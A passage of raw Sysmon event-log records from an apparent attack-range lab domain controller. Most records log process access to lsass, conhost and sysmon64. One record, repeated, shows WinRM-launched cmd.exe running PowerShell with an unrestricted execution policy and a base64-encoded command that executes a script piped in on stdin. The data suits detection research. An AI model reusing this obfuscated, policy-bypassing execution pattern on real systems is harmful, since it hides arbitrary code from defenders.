gASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3DD3-5F80-F456-110000000000}0x1156f40HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{733EE690-3DD3-5F80-F902-000000007E01}2196C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x8000000000000000202Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000201Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3DD3-5F80-F802-000000007E01}47604960C:\Windows\system32\conhost.exe{733EE690-3DD3-5F80-F902-000000007E01}2196C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000200Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000199Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000198Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000197Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000196Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000195Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000194Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000193Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000192Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000191Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3C5B-5F80-0500-000000007E01}640656C:\Windows\system32\csrss.exe{733EE690-3DD3-5F80-F902-000000007E01}2196C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000190Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3DD3-5F80-F702-000000007E01}50484868C:\Windows\system32\WinrsHost.exe{733EE690-3DD3-5F80-F902-000000007E01}2196C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb 154100x8000000000000000189Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.584{733EE690-3DD3-5F80-F902-000000007E01}2196C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3DD3-5F80-F456-110000000000}0x1156f40HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3DD3-5F80-F702-000000007E01}5048C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000188Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000187Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32